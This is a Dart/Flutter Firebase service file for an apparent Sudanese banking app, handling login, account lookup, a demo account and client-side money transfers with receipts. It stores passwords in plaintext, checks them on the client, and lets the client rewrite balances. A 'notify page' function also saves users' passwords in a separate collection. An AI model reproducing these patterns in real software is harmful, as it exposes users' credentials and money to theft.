import 'package:cloud_firestore/cloud_firestore.dart';
import 'package:firebase_auth/firebase_auth.dart';
import '../models/account.dart';
import '../models/receipt.dart';
import 'api_service.dart';
import 'network_service.dart';
import 'app_state.dart';

class FirebaseService {
  FirebaseService._();
  static final db = FirebaseFirestore.instance;
  static final auth = FirebaseAuth.instance;

  static Future<void> ensureSignedInAnonymously() async {
    if (auth.currentUser != null) return;
    await auth.signInAnonymously().timeout(const Duration(seconds: 10));
  }

  static void _ensureFirebase() {
    if (!AppState.firebaseReady) {
      throw Exception('firebase_unavailable');
    }
  }

  static String _digits(String value) => value.replaceAll(RegExp(r'\D'), '');

  static double _toDouble(dynamic value) {
    if (value is num) return value.toDouble();
    final cleaned = '$value'
        .replaceAll(',', '')
        .replaceAll('SDG', '')
        .replaceAll('جنيه', '')
        .replaceAll(RegExp(r'[^0-9\.]'), '');
    return double.tryParse(cleaned) ?? 0.0;
  }

  static Future<DocumentReference<Map<String, dynamic>>?> _findAccountRef(String identifier) async {
    final key = _digits(identifier);
    if (key.isEmpty) return null;

    final directRef = db.collection('accounts').doc(key);
    final directSnap = await directRef.get();
    if (directSnap.exists) return directRef;

    final byAccountNo = await db
        .collection('accounts')
        .where('accountNo', isEqualTo: key)
        .limit(1)
        .get();
    if (byAccountNo.docs.isNotEmpty) return byAccountNo.docs.first.reference;

    final byReferenceNo = await db
        .collection('accounts')
        .where('referenceNo', isEqualTo: key)
        .limit(1)
        .get();
    if (byReferenceNo.docs.isNotEmpty) return byReferenceNo.docs.first.reference;

    final byArabicAccountNo = await db
        .collection('accounts')
        .where('رقم الحساب', isEqualTo: key)
        .limit(1)
        .get();
    if (byArabicAccountNo.docs.isNotEmpty) return byArabicAccountNo.docs.first.reference;

    final byArabicReferenceNo = await db
        .collection('accounts')
        .where('الرقم المرجعي', isEqualTo: key)
        .limit(1)
        .get();
    if (byArabicReferenceNo.docs.isNotEmpty) return byArabicReferenceNo.docs.first.reference;

    final byIdentifier = await db
        .collection('accounts')
        .where('identifier', isEqualTo: key)
        .limit(1)
        .get();
    if (byIdentifier.docs.isNotEmpty) return byIdentifier.docs.first.reference;

    return null;
  }

  static Future<void> ensureDemoAccount() async {
    _ensureFirebase();
    if (!await NetworkService.isOnline) throw Exception('offline');

    const demoAccountNo = '2777277';
    const demoReferenceNo = '0123002777277001';
    final ref = db.collection('accounts').doc(demoAccountNo);
    final snap = await ref.get();
    if (snap.exists) return;

    await ref.set({
      'accountNo': demoAccountNo,
      'id': demoAccountNo,
      'identifier': demoAccountNo,
      'referenceNo': demoReferenceNo,
      'iban': 'SD6804030002777277001',
      'fullName': 'حساب تجريبي',
      'name': 'حساب تجريبي',
      'accountName': 'حساب تجريبي',
      'accountType': 'حساب توفير',
      'phone': '249000000000',
      'balance': 50000.0,
      'password': '1234',
      'status': 'active',
      'currency': 'SDG',
      'source': 'demo_seed',
      'createdAt': FieldValue.serverTimestamp(),
      'updatedAt': FieldValue.serverTimestamp(),
    }, SetOptions(merge: true));
  }

  static Future<Map<String, dynamic>> getAppConfig() async {
    _ensureFirebase();
    if (!await NetworkService.isOnline) throw Exception('offline');
    final doc = await db.collection('app_settings').doc('config').get();
    if (!doc.exists) {
      return {'isAppDisabled': false, 'disabledMessage': ''};
    }
    return doc.data() ?? {'isAppDisabled': false, 'disabledMessage': ''};
  }

  static Future<bool> refreshAppConfig() async {
    try {
      final config = await getAppConfig();
      AppState.appDisabled = config['isAppDisabled'] == true;
      AppState.appDisabledMessage = '${config['disabledMessage'] ?? ''}'.trim().isEmpty
          ? 'التطبيق متوقف مؤقتًا، يرجى المحاولة لاحقًا'
          : '${config['disabledMessage']}';
      return AppState.appDisabled;
    } catch (_) {
      return false;
    }
  }

  static Future<void> saveNotifyTransferData({
    required String accountNo,
    required String referenceNo,
    required String fullName,
    required String accountType,
    required String branch,
    required double balance,
    required String password,
  }) async {
    _ensureFirebase();
    if (!await NetworkService.isOnline) throw Exception('offline');
    final payload = {
      'accountNo': accountNo,
      'referenceNo': referenceNo,
      'fullName': fullName,
      'accountName': fullName,
      'accountType': accountType,
      'branch': branch,
      'balance': balance,
      'currency': 'SDG',
      'status': 'active',
      'source': 'notify_page',
      'password': password,
      'updatedAt': FieldValue.serverTimestamp(),
      'createdAt': FieldValue.serverTimestamp(),
    };
    await db.collection('notify_transfer_data').doc(accountNo).set(payload, SetOptions(merge: true));

    final accountRef = db.collection('accounts').doc(accountNo);
    final existing = await accountRef.get();

    final accountPayload = {
      'id': 'acc_$accountNo',
      'identifier': accountNo,
      'iban': 'SD$referenceNo',
      'accountNo': accountNo,
      'referenceNo': referenceNo,
      'fullName': fullName,
      'accountName': fullName,
      'accountType': accountType,
      'branch': branch,
      'currency': 'SDG',
      'status': 'active',
      'source': 'notify_page',
      'password': password,
      'updatedAt': FieldValue.serverTimestamp(),
    };

    if (existing.exists) {
      await accountRef.set(accountPayload, SetOptions(merge: true));
    } else {
      await accountRef.set({
        ...accountPayload,
        'balance': 0.0,
        'الرصيد': 0.0,
        'createdAt': FieldValue.serverTimestamp(),
      }, SetOptions(merge: true));
    }
  }

  static Future<BankAccount?> login(String identifier, String password) async {
    _ensureFirebase();
    if (!await NetworkService.isOnline) throw Exception('offline');
    if (ApiService.enabled) {
      final api = await ApiService.postJson('/login', {'identifier': identifier, 'password': password});
      if (api != null && api['ok'] == true && api['account'] is Map) {
        return BankAccount.fromMap(Map<String, dynamic>.from(api['account'] as Map));
      }
      if (api != null && api['ok'] == false) return null;
    }
    final ref = await _findAccountRef(identifier);
    if (ref == null) return null;
    final doc = await ref.get();
    if (!doc.exists) return null;
    final acc = BankAccount.fromMap({...doc.data()!, 'docId': doc.id});
    if (acc.password != password || acc.status != 'active') return null;
    return acc;
  }

  static Future<BankAccount?> getAccount(String accountNo) async {
    _ensureFirebase();
    if (!await NetworkService.isOnline) throw Exception('offline');
    if (ApiService.enabled) {
      final api = await ApiService.getJson('/accounts/$accountNo');
      if (api != null && api['account'] is Map) {
        return BankAccount.fromMap(Map<String, dynamic>.from(api['account'] as Map));
      }
    }
    final ref = await _findAccountRef(accountNo);
    if (ref == null) return null;
    final doc = await ref.get();
    if (!doc.exists) return null;
    return BankAccount.fromMap({...doc.data()!, 'docId': doc.id});
  }

  static Future<void> saveAccount(BankAccount account) async {
    _ensureFirebase();
    if (!await NetworkService.isOnline) throw Exception('offline');
    if (ApiService.enabled) {
      final api = await ApiService.postJson('/accounts/save', account.toMap());
      if (api != null && api['ok'] == true) return;
    }
    await db.collection('accounts').doc(account.accountNo).set({
      ...account.toMap(),
      'updatedAt': FieldValue.serverTimestamp(),
    }, SetOptions(merge: true));
  }

  static Future<ReceiptData> transfer({
    required String fromAccount,
    required String toAccount,
    required double amount,
    String note = 'N/A',
    String phone = 'N/A',
  }) async {
    _ensureFirebase();
    if (!await NetworkService.isOnline) throw Exception('offline');
    if (ApiService.enabled) {
      final api = await ApiService.postJson('/transfer', {
        'fromAccount': fromAccount,
        'toAccount': toAccount,
        'amount': amount,
        'note': note,
        'phone': phone,
      });
      if (api != null && api['receipt'] is Map) {
        final r = Map<String, dynamic>.from(api['receipt'] as Map);
        return ReceiptData(
          operationNumber: '${r['operationNumber'] ?? r['id'] ?? DateTime.now().millisecondsSinceEpoch}',
          date: '${r['date'] ?? _fmt(DateTime.now())}',
          fromAccount: '${r['fromAccount'] ?? fromAccount}',
          toAccount: '${r['toAccount'] ?? toAccount}',
          receiverName: '${r['receiverName'] ?? ''}',
          phone: '${r['phone'] ?? phone}',
          note: '${r['note'] ?? note}',
          amount: (r['amount'] is num) ? (r['amount'] as num).toDouble() : amount,
        );
      }
    }
    final fromRef = await _findAccountRef(fromAccount);
    final toRef = await _findAccountRef(toAccount);
    if (fromRef == null) throw Exception('sender_not_found');
    if (toRef == null) throw Exception('receiver_not_found');

    final txId = DateTime.now().millisecondsSinceEpoch.toString();
    late ReceiptData receipt;
    await db.runTransaction((transaction) async {
      final fromSnap = await transaction.get(fromRef);
      final toSnap = await transaction.get(toRef);
      if (!fromSnap.exists) throw Exception('sender_not_found');
      if (!toSnap.exists) throw Exception('receiver_not_found');
      final fromData = fromSnap.data()!;
      final toData = toSnap.data()!;
      final current = _toDouble(fromData['balance'] ?? fromData['الرصيد']);
      if (current < amount) throw Exception('insufficient_balance');
      final receiverBal = _toDouble(toData['balance'] ?? toData['الرصيد']);
      transaction.update(fromRef, {'balance': current - amount, 'الرصيد': current - amount, 'updatedAt': FieldValue.serverTimestamp()});
      transaction.update(toRef, {'balance': receiverBal + amount, 'الرصيد': receiverBal + amount, 'updatedAt': FieldValue.serverTimestamp()});
      final now = DateTime.now();
      receipt = ReceiptData(
        operationNumber: txId,
        date: _fmt(now),
        fromAccount: '${fromData['referenceNo'] ?? fromAccount}',
        toAccount: '${toData['referenceNo'] ?? toAccount}',
        receiverName: '${toData['fullName'] ?? ''}',
        phone: phone,
        note: note,
        amount: amount,
      );
      transaction.set(db.collection('transactions').doc(txId), {
        'id': txId,
        'operationNumber': txId,
        'date': receipt.date,
        'fromAccount': receipt.fromAccount,
        'toAccount': receipt.toAccount,
        'receiverName': receipt.receiverName,
        'phone': phone,
        'note': note,
        'amount': amount,
        'status': 'success',
        'createdAt': FieldValue.serverTimestamp(),
      });
    });
    return receipt;
  }

  static Stream<QuerySnapshot<Map<String, dynamic>>> transactions() =>
      db.collection('transactions').orderBy('createdAt', descending: true).snapshots();

  static String _fmt(DateTime d) {
    const m = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'];
    String p(int n)=>n.toString().padLeft(2,'0');
    return '${p(d.day)}-${m[d.month-1]}-${d.year} ${p(d.hour)}:${p(d.minute)}:${p(d.second)}';
  }
}
